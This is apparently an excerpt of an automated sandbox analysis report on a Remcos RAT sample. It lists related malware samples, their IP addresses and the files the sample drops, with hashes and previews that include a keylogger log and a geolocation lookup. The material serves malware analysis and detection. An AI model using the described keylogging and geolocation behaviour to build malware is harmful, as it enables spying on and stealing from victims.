                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 13.107.246.67
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                          • 13.107.246.67
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 13.107.246.67
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 13.107.246.67
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 13.107.246.67
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 13.107.246.67
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 13.107.246.67
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 13.107.246.67
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 13.107.246.67
                                                                                                                                                                                                                                          geoplugin.net1.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                          • 178.237.33.50
                                                                                                                                                                                                                                          Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                          • 178.237.33.50
                                                                                                                                                                                                                                          heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                          • 178.237.33.50
                                                                                                                                                                                                                                          2LDJIyMl2r.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                          • 178.237.33.50
                                                                                                                                                                                                                                          1evAkYZpwDV0N4v.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                          • 178.237.33.50
                                                                                                                                                                                                                                          94e.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                          • 178.237.33.50
                                                                                                                                                                                                                                          94e.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                          • 178.237.33.50
                                                                                                                                                                                                                                          0442.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                          • 178.237.33.50
                                                                                                                                                                                                                                          1734707047fff7a4a195c1e77157873964de3a3a708aa4bdc0aee24f3a94bc5bd05cc323f3964.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                          • 178.237.33.50
                                                                                                                                                                                                                                          SHROsQyiAd.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                          • 178.237.33.50
                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                          MICROSOFT-CORP-MSN-AS-BLOCKUS4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 157.55.8.211
                                                                                                                                                                                                                                          31.13.224.14-x86-2025-01-03T22_14_18.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                          • 20.85.193.111
                                                                                                                                                                                                                                          random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 104.46.162.224
                                                                                                                                                                                                                                          random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 20.52.64.201
                                                                                                                                                                                                                                          2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 51.122.34.90
                                                                                                                                                                                                                                          https://track2.mccarthysearch.com/9155296/c?p=UJEwZLRSuPVlnD1ICTWZusB5H46ZFxhQFeZmgv_N89FzkqdhuHSGoPyB5qZfahmny00oVnRJ_XGR4M89Ovy-j3JZN_nz1Nb-BfHfDXVFwrd4A8njKtxWHgVV9KpuZ3ad6Xn31h13Ok4dSqgAUkhmVH1KUMKOlrKi5AYGmafMXkrBRxU_B4vy7NXVbEVJ970TwM25LbuS_B0xuuC5g8ehQDyYNyEV1WCghuhx_ZKmrGeOOXDf8HkQ-KOwv_tecp8TMdskXzay5lvoS31gB-nWxsjPaZ8f84KWvabQB4eF73ffpyNcTpJues_4IHHPjEKJ9ritMRTaHbFdQGNT_n13X_E7no0nMmaegQjwo4kKGu6oR02iG2c_6ucy3I6d8vsNl324Pjhx3M20dDmfZAju1roW9lGyO1LfgEnp1iSAFpx4kA7frEmKGzJYNX_cZrwVBoH8vvIYauXGnXBrZacRhuZGGbOjW2HHr9KF-0q7xjdgG2hxjWZ2H9zjubJGDnUjHRfiIr_-0bem1pLFqziEmy0450LGuXV23cQ6GD8yuK9tuRwMIF0sbkhVqONC0e6TsXlkUuTRAVWBbLlRPcygJ-CbukwvFtAxobVQ8-PpIuGj97DYFnmbfbJrrZDtH57TpdP4AxtW5k74BKSXvb1B6JX0p7Oyr1kXxLs_OrNPdAdrf8gXR35D9W7WeQ2zhPEqP0Mv5sJx4DlYh6Y4FqgPfCRFcDcL7Cy3HSlJ0XYfv-ae4o-hdX_0rJPqEG_-Bn2yj60YPDYpE8KDIgC_ZMwlNLdK4pAK6vSt4NWDncuV5y7QDqt97ribjd4U3AOvQTKW9r_eMky9-IC9hkSPrg2S0ZBgA9ITW3AQ3v-lq94cAwt1v1RLaFgsy67l_7lni1gYsZaQdOsFJsDpCFYaZsTMcVz2QAnQ_2UidhzlUekPl5xh9LNe9o77rO1FolZslooaXxCf2U2RZmvUA6NCNiGZ8KSsoUYTnqAHenvBJVJwMWd66yD2O60rC3Ic2qOQ1KOF9AB6-iFTvQFxtSTjS2hFwi7N97LeQtVYKhdzZuq2SasgJg0JPnZiFv_FSbgmiodqx9rz_lWIqWQNoQVht-oO2BfFxSF_aedAmm2MuQAL7z8UjBf_deiKwQyfKOyA6ZkAJ14F9xwhNm9F7B4PBgDtocqJQBjw5Cf1jCBSAs3nSYP2_nzofJuQSXd-YD9PIzkkmJw7Nqux7IgJ6p1z2Hsf6i3zShVdZY3g2mmA1xR1FV1LoSYwcRBqZt3pv0UDjuqCEoiqKDuyT0rkhqTRLo29uuM588Lna16PFSgSLoLUhnJ2rx8NLQQc5TqrsGjlN-ulCwTEyA0C9Epz9mxq14yDjw==Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 13.107.42.14
                                                                                                                                                                                                                                          3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 51.142.50.179
                                                                                                                                                                                                                                          armv6l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                          • 20.40.176.182
                                                                                                                                                                                                                                          1.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 157.56.241.207
                                                                                                                                                                                                                                          armv5l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                          • 20.75.71.78
                                                                                                                                                                                                                                          COMBAHTONcombahtonGmbHDEb1593574e46fb1f30b1da4fa594f43bb52b051a616db3.exeGet hashmaliciousXenoRATBrowse
                                                                                                                                                                                                                                          • 194.59.30.69
                                                                                                                                                                                                                                          Syncing.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                                                          • 185.223.30.86
                                                                                                                                                                                                                                          l4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 194.59.30.220
                                                                                                                                                                                                                                          l4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 194.59.30.220
                                                                                                                                                                                                                                          client.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 194.59.30.220
                                                                                                                                                                                                                                          client.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 194.59.30.220
                                                                                                                                                                                                                                          Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse

Process: C:\Users\user\AppData\Roaming\Graias\graias.exe
File Type: data
Category: dropped
Size (bytes): 8476
Entropy (8bit): 3.5602841485909233
Encrypted: false
SSDEEP: 96:xgy4eOnLq4TXjLq48OLq4dCImLq433CLq4ILq4g4Lq4mFBLq4neLq4NMLq4EMLqr:MuCuCuRu/uVuAuHuTuzuYubu6u4
MD5: 2692EF8BCE89A06E76A4C47FD28EBFA1
SHA1: 0859D5695DB371BE69163BFD4BEA124365E5ADD9
SHA-256: 3299D7091D38906B07B21844F0D68AF619A1970A8ED5E04A479C26B7BAA396C3
SHA-512: 165236A479962FA1D4FC740BECB306C564FBA2B814B55DA665DCCFCD9F25EDE2C34F1202D951F96C4AAF85ACB8EF6998BE7C77591DB6A4E9EB6A93F014E5A93B
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\graias\logs.dat, Author: Joe Security
Preview: ....[.2.0.2.5./.0.1./.0.3. .1.8.:.0.2.:.0.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].....[.W.i.n.].r.....[.2.0.2.5./.0.1./.0.3. .1.8.:.0.2.:.0.1. .R.u.n.].........[.2.0.2.5./.0.1./.0.3. .1.8.:.0.2.:.0.2. .s.v.c.h.o.s.t...e.x.e. .-. .T.h.i.s. .a.p.p.l.i.c.a.t.i.o.n. .c.o.u.l.d. .n.o.t. .b.e. .s.t.a.r.t.e.d...].........[.2.0.2.5./.0.1./.0.3. .1.8.:.0.2.:.0.3. .R.u.n.].........[.2.0.2.5./.0.1./.0.3. .1.8.:.0.2.:.0.4. .s.v.c.h.o.s.t...e.x.e. .-. .T.h.i.s. .a.p.p.l.i.c.a.t.i.o.n. .c.o.u.l.d. .n.o.t. .b.e. .s.t.a.r.t.e.d...].........[.2.0.2.5./.0.1./.0.3. .1.8.:.0.2.:.0.5. .U.n.t.i.t.l.e.d. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.2.0.2.5./.0.1./.0.3. .1.8.:.0.2.:.0.8. .s.v.c.h.o.s.t...e.x.e. .-. .T.h.i.s. .a.p.p.l.i.c.a.t.i.o.n. .c.o.u.l.d. .n.o.t. .b.e. .s.t.a.r.t.e.d...].....[.W.i.n.].r.....[.2.0.2.5./.0.1./.0.3. .1.8.:.0.2.:.0.9. .R.u.n.].........[.2.0.2.5./.0.1./.0.3. .1.8.:.0.2.:.1.0. .U.n.t.i.t.l.e.d. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.2.0.2.5./.0.1./.0.3. .1.8.

Process: C:\Windows\SysWOW64\dxdiag.exe
File Type: data
Category: dropped
Size (bytes): 65552
Entropy (8bit): 0.01237149505889543
Encrypted: false
SSDEEP: 3:N+/lGlll/l/lXp9ZjrPBY06llcllXwiEl/lRP:m0dPBY0O6/giEXJ
MD5: 27754E2DB48BC95315A62B86FD981E5A
SHA1: 1568ECDB144BE9F8DBC488BC4944D89E31058EA5
SHA-256: 84560889FB3E1F4E9F6302D1A73D62C85E0F7544DCC1255328B8643A0BFCCA09
SHA-512: FC8BF7FE7489942015F32F2D93DE1B3F3A07E08AAEBC872E89E5C9C20A21449D9BB7E4576695C6C81411BDABD9A96F658F6CD4A1CC502D7045B9DB8568C422F1
Malicious: false

Process: C:\Windows\SysWOW64\dxdiag.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 4
Entropy (8bit): 1.5
Encrypted: false
SSDEEP: 3:R:R
MD5: F49655F856ACB8884CC0ACE29216F511
SHA1: CB0F1F87EC0455EC349AAA950C600475AC7B7B6B
SHA-256: 7852FCE59C67DDF1D6B8B997EAA1ADFAC004A9F3A91C37295DE9223674011FBA
SHA-512: 599E93D25B174524495ED29653052B3590133096404873318F05FD68F4C9A5C9A3B30574551141FBB73D7329D6BE342699A17F3AE84554BAB784776DFDA2D5F8
Malicious: false
Preview: EERF

Process: C:\Windows\SysWOW64\dxdiag.exe
File Type: Matlab v4 mat-file (little endian) (, numeric, rows 0, columns 16, imaginary
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.020296169267305913
Encrypted: false
SSDEEP: 3:9llpl5d2DJqojBdl+Sli5l2GkNl0lR9TNlktt/llaia9sVQMm4qNw:c9q0Bn+SkyGkNlUetb2Hsqi
MD5: AE2B45690B7A2B278AD387D9AB374E16
SHA1: 1822D3444AF5A00E882B9D1483CCE518FF57FD09
SHA-256: F617DFE9D4C2FE77DC462523FF803A1C7D9E23E014D63F64D2202DFC519BFEE7
SHA-512: 36D490650F9FB4280A83B9869F54C8C4B2AA317652397726107B44AF344E377118A6306DE71BC2D4DE012CDDD8E8A7C157F6164D619F315D264841E36137A01D
Malicious: false

Process: C:\Users\user\AppData\Roaming\Graias\graias.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process: C:\Users\user\Desktop\iGhDjzEiDU.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):963
                                                                                                                                                                                                                                          Entropy (8bit):5.019205124979377
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlupdVauKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                                                                                                          MD5:B62617530A8532F9AECAA939B6AB93BB
                                                                                                                                                                                                                                          SHA1:E4DE9E9838052597EB2A5B363654C737BA1E6A66
                                                                                                                                                                                                                                          SHA-256:508F952EF83C41861ECD44FB821F7BB73535BFF89F54D54C3549127DCA004E70
                                                                                                                                                                                                                                          SHA-512:A0B385593B721313130CF14182F3B6EE5FF29D2A36FED99139FA2EE838002DFEEC83285DEDEAE437A53D053FCC631AEAD001D3E804386211BBA2F174134EA70D
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                                                          Entropy (8bit):5.379460230152629
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZSUyus:fLHyIFKL3IZ2KRH9OugEs
                                                                                                                                                                                                                                          MD5:C0097F75360CA66B65DB5A4E62501B4D
                                                                                                                                                                                                                                          SHA1:B6EE5A4442E2C932AF07B472D8F4EB5DC1F2EBD3
                                                                                                                                                                                                                                          SHA-256:18E34BD63BEFE61C852C04D8C9294201F91B905D50D3BBFC7411FD598FF8F8AE
                                                                                                                                                                                                                                          SHA-512:64BF0392903A9CF79BF54B82C1CB5E8C8323D746125AA64575D2BB9B4343F55FE9DF6D347B8BE0F43ED1470DBA9E46B46F7D6BCEF6047E565544529DBA517693
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):15728640
                                                                                                                                                                                                                                          Entropy (8bit):0.10805027086476268
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1536:+SB2jpSB2jFSjlK/Qw/ZweshzbOlqVqmesAzbIBl73esleszO/Z4zbU/L:+a6aOUueqVRIBYvOU
                                                                                                                                                                                                                                          MD5:9F6FBA8CABF6D4ECDD5B285F375D352B
                                                                                                                                                                                                                                          SHA1:ED0D370573441F24C1FEF0F1D7A92DB58AA484D8
                                                                                                                                                                                                                                          SHA-256:4C764E2DF9F41B915772A2259A958DB29E6476693225882D1FBAE286C22AFB41
                                                                                                                                                                                                                                          SHA-512:75C78BF6271DBDFE3A044ADF75F84AF49867E63BD614F0A300A676A73A736432C16C2DA686177B01E01BE6018178CCD060FB009DA012AD876BFD632833046A0C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:n..y... ...................':...{........................Z.....9....{S......{w.h.\.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...................................H......{w.................2.G......{w..........................#......h.\.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                                                          Entropy (8bit):1.1358696453229276
